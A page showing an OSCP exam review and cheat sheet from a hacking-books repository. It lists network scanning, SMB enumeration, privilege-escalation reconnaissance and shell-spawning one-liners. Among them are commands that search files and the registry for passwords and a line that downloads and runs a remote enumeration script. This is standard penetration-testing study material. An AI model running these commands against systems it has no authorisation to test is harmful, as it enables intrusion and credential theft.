Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
XCHADXFAQ77X
GitHub Repository: XCHADXFAQ77X/HACKING-BOOKS-X
 Path: blob/master/7-part-100-article/OSCP Review-Cheat Sheet.txt
317 views
1
OSCP Review/Cheat Sheet

2
After 30 days of lab time, 24 boxes, and countless nights of no sleep, I can officially say I passed OSCP. And like every other person who’s passed the course, I’m going to do a little write up, except this time. Before I begin, I’ll make it very clear I had previous experience in pen testing and information security. Overall, what makes this course so valuable isn’t the exploits itself, but the technique behind them. Anyone can type “searchsploit ENTER_SOMETHING_HERE” and hope for the best. The hard part is enumerating everything, from dirb to crawling anonymous FTP servers. Cheat sheet time…

3


4
Enumeration:

5


6
Sparta

7
Hands down your best friend for the lab and exam. It run multiple NMAP scans, TCP and UDP along with the option of using unicorn. What makes this tool incredibly useful is that you can right click open ports and see what tools are available to use on it. Plus, who doesn’t love a clean GUI?

8
Nmap:

9


10
Set the ip address as a variable

11
export ip=192.168.1.100 nmap -A -T4 -p- $ip

12
Netcat port Scanning

13
nc -nvv -w 1 -z $ip 3388-3390

14
Discover active IPs usign ARP on the network: arp-scan $ip/24

15
Discover who else is on the network

16
netdiscover

17
Discover IP Mac and Mac vendors from ARP

18
netdiscover -r $ip/24

19
Nmap stealth scan using SYN

20
nmap -sS $ip

21
Nmap stealth scan using FIN

22
nmap -sF $ip

23
Nmap Banner Grabbing

24
nmap -sV -sT $ip

25
Nmap OS Fingerprinting

26
nmap -O $ip

27
Nmap Regular Scan:

28
nmap $ip/24

29
Enumeration Scan

30
nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt

31
Enumeration Scan All Ports TCP / UDP and output to a txt file

32
nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip

33
Nmap output to a file:

34
nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24

35
Quick Scan:

36
nmap -T4 -F $ip/24

37
Quick Scan Plus:

38
nmap -sV -T4 -O -F –version-light $ip/24

39
Quick traceroute

40
nmap -sn –traceroute $ip

41
All TCP and UDP Ports

42
nmap -v -sU -sS -p- -A -T4 $ip

43
Intense Scan:

44
nmap -T4 -A -v $ip

45
Intense Scan Plus UDP

46
nmap -sS -sU -T4 -A -v $ip/24

47
Intense Scan ALL TCP Ports

48
nmap -p 1-65535 -T4 -A -v $ip/24

49
Intense Scan – No Ping

50
nmap -T4 -A -v -Pn $ip/24

51
Ping scan

52
nmap -sn $ip/24

53
Slow Comprehensive Scan

54
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 –script “default or (discovery and safe)” $ip/24

55
Scan with Active connect in order to weed out any spoofed ports designed to troll you

56
nmap -p1-65535 -A -T5 -sT $ip

57
SMB

58


59
SMB OS Discovery

60
nmap $ip –script smb-os-discovery.nse

61
Nmap port scan

62
nmap -v -p 139,445 -oG smb.txt $ip-254

63
Netbios Information Scanning

64
nbtscan -r $ip/24

65
Nmap find exposed Netbios servers

66
nmap -sU –script nbstat.nse -p 137 $ip

67
Nmap all SMB scripts scan

68
SMB Enumeration Tools

69


70
smbclient //MOUNT/share -I $ip -N

71
rpcclient -U “” $ip

72
enum4linux $ip

73
enum4linux -a $ip

74
SMB Finger Printing

75
smbclient -L //$ip

76
Nmap Scan for Open SMB Shares

77
nmap -T4 -v -oA shares –script smb-enum-shares –script-args smbuser=username,smbpass=password -p445 192.168.10.0/24

78
Nmap scans for vulnerable SMB Servers

79
nmap -v -p 445 –script=smb-check-vulns –script-args=unsafe=1 $ip

80
Nmap List all SMB scripts installed

81
ls -l /usr/share/nmap/scripts/smb*

82
Linux OS Enumeration

83


84
List all SUID files

85
find / -perm -4000 2>/dev/null

86
Determine the current version of Linux

87
cat /etc/issue

88
Determine more information about the environment

89
uname -a

90
List processes running

91
ps -xaf

92
List the allowed (and forbidden) commands for the invoking use

93
sudo -l

94
List iptables rules

95
iptables –table nat –list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security

96
Windows OS Enumeration

97


98
net config Workstation

99
systeminfo | findstr /B /C:”OS Name” /C:”OS Version”

100
hostname

101
net users

102
ipconfig /all

103
route print

104
arp -A

105
netstat -ano

106
netsh firewall show state

107
netsh firewall show config

108
schtasks /query /fo LIST /v

109
tasklist /SVC

110
net start

111
DRIVERQUERY

112
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

113
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

114
dir /s pass== cred == vnc == .config

115
findstr /si password *.xml *.ini *.txt

116
reg query HKLM /f password /t REG_SZ /s

117
reg query HKCU /f password /t REG_SZ /s

118
File Enumeration

119
Find UID 0 files root execution

120
/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null

121
Get handy linux file system enumeration script (/var/tmp)

122
wget https://highon.coffee/downloads/linux-local-enum.sh chmod +x ./linux-local-enum.sh ./linux-local-enum.sh

123
Find executable files updated in August

124
find / -executable -type f 2> /dev/null | egrep -v “^/bin|^/var|^/etc|^/usr” | xargs ls -lh | grep Aug

125
Find a specific file on linux

126
find /. -name suid\*

127
Find all the strings in a file

128
strings <filename>

129
Determine the type of a file

130
file <filename>

131
Spawning Shells:

132


133
python -c ‘import pty; pty.spawn(“/bin/sh”)’

134
echo os.system(‘/bin/bash’)

135
/bin/sh -i

136
perl —e ‘exec “/bin/sh”;’

137
perl: exec “/bin/sh”;

138
ruby: exec “/bin/sh”

139
lua: os.execute(‘/bin/sh’)

140
From within IRB: exec “/bin/sh”

141
From within vi: :!bash or

142
:set shell=/bin/bash:shell

143
From within vim ‘:!bash’:

144
From within nmap: !sh

145